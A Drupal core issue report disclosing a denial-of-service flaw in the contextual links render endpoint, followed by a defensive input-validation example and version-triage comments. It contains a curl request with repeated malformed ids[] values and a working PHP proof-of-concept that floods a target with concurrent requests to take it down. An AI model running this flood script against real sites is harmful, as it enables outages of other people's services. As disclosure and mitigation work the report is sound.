The ContextualController::render() method accepts parameters from the HTTP request without proper validation.

Steps to reproduce:

  1. Create an account with permission to use contextual links (you may add this permission to the anonymous role for testing purposes).
  2. Execute the following POST request on behalf of this account.
    curl --data "ids[]=node:node[]" https://example.com/contextual/render
  3. Navigate to admin/reports/dblog and check new records in the log (there should be about 9 PHP errors logged)

Generally, being able to produce PHP errors with an HTTP request is not considered a security issue. There are multiple other ways to do so, even without special permissions. However, this case is different because you can multiply the number of errors by repeating POST parameters.
For example:

  • ids[]=node:node[] - causes 9 PHP errors
  • ids[]=node:node[]&ids[]=node:node[] - causes 18 PHP errors
  • ids[]=node:node[]&ids[]=node:node[]&ids[]=node:node[] - causes 21 PHP errors

With a specially crafted HTTP request I was able to put 9000 PHP errors into watchdog at once. Since catching and logging PHP errors is an expensive operation, this gives a great opportunity to carry out DDoS attacks.

Below is a proof-of-concept script.


<?php
// Target site, number of parallel requests, and number of repeated ids[] values per request.
$url = 'https://example.com';
$concurrency = 100;
$quantity = 1000;

// Build $concurrency POST requests to /contextual/render, each carrying $quantity malformed ids.
$mh = curl_multi_init();
$handlers = [];
for ($i = 1; $i <= $concurrency; $i++) {
  $handlers[] = $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, $url . '/contextual/render');
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
  curl_setopt($ch, CURLOPT_POSTFIELDS, str_repeat('ids[]=node:node[]&', $quantity));
  curl_multi_add_handle($mh, $ch);
}

// Run all handles concurrently until every request has completed.
$running = NULL;
do {
  curl_multi_exec($mh, $running);
  curl_multi_select($mh);
}
while ($running);

// Print the HTTP status and (tag-stripped) body of each response.
foreach ($handlers as $ch) {
  echo '-> ', curl_getinfo($ch, CURLINFO_HTTP_CODE), "\n";
  echo strip_tags(curl_multi_getcontent($ch)), "\n";
  curl_multi_remove_handle($mh, $ch);
}

curl_multi_close($mh);

On my local Docker container $concurrency = 5 was enough to take the site down. On simplytest.me it varies from 50 to 100.

Mitigation

The attacker needs to have the "Use contextual links" permission.
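The defensive counterpart to the report above, as an added example that is not Drupal's own code: validate the ids[] parameter up front so that a single request cannot trigger an unbounded number of PHP errors. The cap MAX_CONTEXTUAL_IDS, the function name and the id pattern (modelled on ids of the shape node:node=1:changed=...&langcode=en) are assumptions chosen for illustration.

```php
<?php
// Added example, not Drupal core code: reject malformed or excessive ids[]
// values before any rendering work happens. The cap and the id pattern are
// illustrative assumptions, not values taken from Drupal.

const MAX_CONTEXTUAL_IDS = 100;

/**
 * Returns the de-duplicated, well-formed ids, or throws on bad input.
 *
 * @param mixed $ids The raw request value (e.g. $request->request->get('ids')).
 */
function validate_contextual_ids($ids): array {
  if (!is_array($ids)) {
    throw new InvalidArgumentException('ids must be an array of strings');
  }
  // Bound the work per request before inspecting any individual id.
  if (count($ids) > MAX_CONTEXTUAL_IDS) {
    throw new InvalidArgumentException('too many ids in one request');
  }
  $accepted = [];
  foreach ($ids as $id) {
    // Assumed shape: "group:routeparams:metadata", restricted to a conservative
    // allow-list of characters. The report's "node:node[]" fails this check.
    if (!is_string($id) || !preg_match('/^[a-z0-9_]+:[a-z0-9_=&%.-]+:[a-z0-9_=&%.-]*$/', $id)) {
      throw new InvalidArgumentException('malformed contextual id');
    }
    $accepted[$id] = TRUE; // a repeated id is rendered once, not N times
  }
  return array_keys($accepted);
}

// Usage with constructed inputs.
var_dump(validate_contextual_ids(['node:node=1:changed=1&langcode=en']));
try {
  validate_contextual_ids(array_fill(0, 1000, 'node:node[]'));
}
catch (InvalidArgumentException $e) {
  echo 'rejected: ', $e->getMessage(), "\n";
}
```

Inside a real controller the exceptions would map to a 400 response (Symfony's BadRequestHttpException) so that rejected requests are cheap and never reach the error logger.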


The issue was moved from s.d.o after security team approval.

Comments

Chi created an issue. See original summary.


Version: 8.3.x-dev » 8.4.x-dev

Drupal 8.3.6 was released on August 2, 2017 and is the final full bugfix release for the Drupal 8.3.x series. Drupal 8.3.x will not receive any further development aside from critical and security fixes. Sites should prepare to update to 8.4.0 on October 4, 2017. (Drupal 8.4.0-alpha1 is available for testing.)

Bug reports should be targeted against the 8.4.x-dev branch from now on, and new development or disruptive changes should be targeted against the 8.5.x-dev branch. For more information see the Drupal 8 minor version schedule and the Allowed changes during the Drupal 8 release cycle.

Version: 8.4.x-dev » 8.5.x-dev

Drupal 8.4.4 was released on January 3, 2018 and is the final full bugfix release for the Drupal 8.4.x series. Drupal 8.4.x will not receive any further development aside from critical and security fixes. Sites should prepare to update to 8.5.0 on March 7, 2018. (Drupal 8.5.0-alpha1 is available for testing.)

Bug reports should be targeted against the 8.5.x-dev branch from now on, and new development or disruptive changes should be targeted against the 8.6.x-dev branch. For more information see the Drupal 8 minor version schedule and the Allowed changes during the Drupal 8 release cycle.

Version: 8.5.x-dev » 8.6.x-dev

Drupal 8.5.6 was released on August 1, 2018 and is the final bugfix release for the Drupal 8.5.x series. Drupal 8.5.x will not receive any further development aside from security fixes. Sites should prepare to update to 8.6.0 on September 5, 2018. (Drupal 8.6.0-rc1 is available for testing.)

Bug reports should be targeted against the 8.6.x-dev branch from now on, and new development or disruptive changes should be targeted against the 8.7.x-dev branch. For more information see the Drupal 8 minor version schedule and the Allowed changes during the Drupal 8 release cycle.

Version: 8.6.x-dev » 8.8.x-dev

Drupal 8.6.x will not receive any further development aside from security fixes. Bug reports should be targeted against the 8.8.x-dev branch from now on, and new development or disruptive changes should be targeted against the 8.9.x-dev branch. For more information see the Drupal 8 and 9 minor version schedule and the Allowed changes during the Drupal 8 and 9 release cycles.

Version: 8.8.x-dev » 8.9.x-dev

Drupal 8.8.7 was released on June 3, 2020 and is the final full bugfix release for the Drupal 8.8.x series. Drupal 8.8.x will not receive any further development aside from security fixes. Sites should prepare to update to Drupal 8.9.0 or Drupal 9.0.0 for ongoing support.

Bug reports should be targeted against the 8.9.x-dev branch from now on, and new development or disruptive changes should be targeted against the 9.1.x-dev branch. For more information see the Drupal 8 and 9 minor version schedule and the Allowed changes during the Drupal 8 and 9 release cycles.

Version: 8.9.x-dev » 9.2.x-dev

Drupal 8 is end-of-life as of November 17, 2021. There will not be further changes made to Drupal 8. Bugfixes are now made to the 9.3.x and higher branches only. For more information see the Drupal core minor version schedule and the Allowed changes during the Drupal core release cycle.

Version: 9.2.x-dev » 9.3.x-dev

Status: Active » Closed (duplicate)